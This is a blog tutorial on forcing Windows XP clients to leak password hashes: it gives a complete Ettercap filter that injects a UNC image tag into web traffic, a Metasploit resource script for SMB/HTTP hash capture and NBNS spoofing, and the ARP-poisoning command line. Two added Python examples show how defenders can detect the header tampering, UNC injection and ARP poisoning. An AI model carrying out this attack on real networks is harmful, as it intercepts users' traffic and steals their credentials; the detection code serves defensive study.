Tuesday, 1 November 2011

Using Ettercap to improve NetBIOS attacks

For those of you that have tried out NetBIOS spoofing (explained here), you know how devastatingly effective this is on an internal network. There are, however, times when good crackable hashes just don't seem to be passing your way. Maybe the network is quiet, or you are only getting NTLMv2 hashes that you can't seem to crack. If only you could somehow force those XP clients to send over their users' LM hashes...
Well... it seems you can with Ettercap, and it works very well too.
One of the great things about Ettercap is that you can do so much more with man-in-the-middle attacks than with Cain, for instance. DNS spoofing, ARP spoofing, iframe injection and many more are possible with this tool. Today, though, we are going to use a custom filter that injects some HTML to make the clients connect to a fake share on our machine, so that we can then harvest their authentication hashes.

Remember, for this attack to work you will need to be targeting wired clients on the network (unless they are using open or WEP wifi), as we will be actively changing their traffic. This is not possible on a WPA network because each client uses its own encryption keys.

First of all you will need to set up Metasploit.
Let's see if we can find some low-hanging fruit (XP machines):

use auxiliary/scanner/smb/smb_version

Excellent, some target XP machines. Make a note of these IP addresses, as we will need to target them with Ettercap next.

Now we need to get our filter configured for Ettercap. As you can see from the filter below, we will be adding an HTML tag into the web pages that the target is viewing. This tag tells the browser that it needs to load an image for the page, and to load it from a share on your IP.
The image won't be there, but Metasploit will capture these requests, spoof the challenge, and capture the user's hash.

Modify the following filter to your own IP address, and save this as netbios.filter.

 if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
       # rename the header in place (same length) so the server answers with
       # uncompressed HTML that the second block can edit
       replace("Accept-Encoding", "Accept-gnidocnE");
       msg("Encoding Taken Care Of...\n");
    }
 }
 if (ip.proto == TCP && tcp.src == 80) {
    # <yourIP> and the share name are placeholders: substitute your own address
    replace("head>", "head> <img src=\"\\\\\\<yourIP>\\share\\pixel.gif\"> ");
    msg("Replacement Filter Ran.\n");
 }
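From the defender's side, both edits this filter makes are visible on the wire: the rewritten request carries a header name no browser sends, and the response carries an `<img>` tag whose `src` is a Windows UNC path, which no page served over HTTP has a legitimate reason to include. The following is an added example, not code from the original post: a simplified version of the checks an inline web proxy or IDS signature can perform. The request, response, IP address and share name are constructed for the demonstration.

```python
"""Defender-side checks for the two on-the-wire edits the filter above performs.

Added example, not code from the original post: a simplified version of what an
inline web proxy or IDS signature can do. Sample request/response are constructed.
"""
import re
from typing import Dict, List

# Request header names a browser normally sends. A MITM filter that overwrites
# a header name in place (same length, so TCP sequence numbers stay valid)
# produces a name that is not on this list.
KNOWN_REQUEST_HEADERS = {
    "host", "user-agent", "accept", "accept-language", "accept-encoding",
    "accept-charset", "connection", "cookie", "referer", "cache-control",
    "pragma", "if-modified-since", "if-none-match", "authorization", "origin",
    "content-type", "content-length", "upgrade-insecure-requests", "dnt",
}

# <img src="\\host\share\file"> (two literal backslashes) or file://///host/...
UNC_IMG_RE = re.compile(
    r"<img\b[^>]*?\bsrc\s*=\s*[\"']?((?:\\\\|file:/{4,})[^\"'>\s]+)",
    re.IGNORECASE,
)


def unknown_request_headers(raw_request: str) -> List[str]:
    """Return header names in an HTTP request that no browser would send."""
    lines = raw_request.split("\r\n")[1:]          # skip the request line
    unknown = []
    for line in lines:
        if not line:                               # blank line ends the headers
            break
        name = line.split(":", 1)[0].strip()
        if name.lower() not in KNOWN_REQUEST_HEADERS:
            unknown.append(name)
    return unknown


def unc_image_sources(html: str) -> List[str]:
    """Return src attributes of <img> tags that point at a Windows share.

    Content served over HTTP has no legitimate reason to reference a UNC path;
    a Windows browser would authenticate to that host automatically.
    """
    return [m.group(1) for m in UNC_IMG_RE.finditer(html)]


def inspect_exchange(raw_request: str, response_body: str) -> Dict[str, List[str]]:
    """Combine both checks into one verdict for a request/response pair."""
    return {
        "tampered_headers": unknown_request_headers(raw_request),
        "unc_images": unc_image_sources(response_body),
    }


# Constructed sample traffic: the request as it reaches the server after the
# header rewrite, and the response as the victim's browser receives it.
SAMPLE_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept-gnidocnE: gzip, deflate\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    '<html><head> <img src="\\\\192.0.2.10\\share\\pixel.gif"> '
    "<title>Intranet</title></head><body>hello</body></html>"
)

if __name__ == "__main__":
    print(inspect_exchange(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

The header check flags any unfamiliar request header name rather than one specific string, so it catches whatever replacement text a filter author chooses as long as the original header is no longer present; the image check is the one that matters most, because a UNC reference in HTML is unambiguous regardless of how it got there.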

Next, we need to install Ettercap: apt-get install ettercap
Then, from within the /usr/local/share/ettercap folder, run etterfilter /root/netbios.filter -o netbios.ef.
This compiles the filter into a format Ettercap can understand.

We now need to return to Metasploit and set up the NetBIOS spoofing modules so that they are ready to capture the incoming hashes. You can use the following resource script to save time:

# <yourIP> is a placeholder: replace it with your own address before running
use auxiliary/server/capture/smb
set srvhost <yourIP>
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
run -j
use auxiliary/server/capture/http_ntlm
set srvhost <yourIP>
set cainpwfile /tmp/cain
set johnpwfile /tmp/john
set uripath /share
set srvport 80
run -j
use auxiliary/spoof/nbns/nbns_response
set spoofip <yourIP>
run -j

Once you have this running, we can now start ettercap:

ettercap -TqF netbios.ef -M arp:remote /,29,30/ /<gatewayIP>/ -i eth0

This starts Ettercap in text mode (-T), without verbose output (-q), loading the compiled NetBIOS filter (-F) and using ARP poisoning (-M arp:remote) between the three XP clients and the gateway.
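The arp:remote poisoning described here leaves a distinctive trace: the gateway's IP suddenly resolves to a new MAC address on every victim, and that same MAC answers for each victim's IP towards the gateway. The following is an added example, not code from the original post: an arpwatch-style monitor that applies both checks to a list of ARP reply records. The records, addresses and MACs are constructed; in practice they would come from a sniffer or from a switch's dynamic ARP inspection logs.

```python
"""Spot ARP cache poisoning of the kind Ettercap's arp:remote mode performs.

Added example, not code from the original post: an arpwatch-style monitor fed
with constructed ARP reply records. All IPs and MACs below are made up.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class ArpReply:
    ts: float        # seconds since capture start
    sender_ip: str   # IP address the sender claims to own
    sender_mac: str  # hardware address carried in the reply


def detect_arp_spoofing(replies: List[ArpReply], many_ips: int = 3) -> List[Tuple[str, str]]:
    """Return (kind, detail) alerts for a sequence of ARP replies.

    ip-changed-mac  : an IP that was bound to one MAC is now claimed by another;
                      this is what the gateway and each client look like once
                      they are re-pointed at the attacker's interface.
    mac-claims-many : one MAC answers for >= many_ips distinct IPs. A host
                      impersonating the gateway plus every victim does this;
                      routers doing proxy ARP are the legitimate exception, so
                      tune many_ips or allow-list them.
    """
    ip_to_mac: Dict[str, str] = {}
    mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
    alerts: List[Tuple[str, str]] = []

    for r in sorted(replies, key=lambda x: x.ts):
        known = ip_to_mac.get(r.sender_ip)
        if known is not None and known != r.sender_mac:
            alerts.append(("ip-changed-mac",
                           f"t={r.ts:.0f}s {r.sender_ip}: {known} -> {r.sender_mac}"))
        ip_to_mac[r.sender_ip] = r.sender_mac
        mac_to_ips[r.sender_mac].add(r.sender_ip)

    for mac, ips in mac_to_ips.items():
        if len(ips) >= many_ips:
            alerts.append(("mac-claims-many", f"{mac} claims {sorted(ips)}"))
    return alerts


# Constructed capture: a normal baseline, then one host (the MITM) claiming the
# gateway address towards the clients and the client addresses towards the gateway.
GATEWAY, CLIENTS = "192.0.2.1", ["192.0.2.29", "192.0.2.30", "192.0.2.31"]
MITM_MAC = "de:ad:be:ef:00:01"
SAMPLE_REPLIES = [
    ArpReply(0, GATEWAY, "00:11:22:33:44:01"),
    ArpReply(1, CLIENTS[0], "00:11:22:33:44:29"),
    ArpReply(2, CLIENTS[1], "00:11:22:33:44:30"),
    ArpReply(3, CLIENTS[2], "00:11:22:33:44:31"),
    ArpReply(60, GATEWAY, MITM_MAC),
] + [ArpReply(61 + i, ip, MITM_MAC) for i, ip in enumerate(CLIENTS)]

if __name__ == "__main__":
    for kind, detail in detect_arp_spoofing(SAMPLE_REPLIES):
        print(f"[{kind}] {detail}")
```

The first alert type fires as soon as the gateway binding flips, which is within seconds of the poisoning starting; the second confirms that a single interface is behind all of the changed bindings, which separates a MITM from an innocent DHCP lease change or a replaced NIC.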

Once the users on these clients start browsing web pages, you should see a flurry of hashes coming your way :0)

Remember to press "q" once you have these hashes: on quitting, Ettercap re-ARPs the victims with the correct MAC addresses, which prevents any network drop-out.

Make sure you have permission first, and have fun folks!
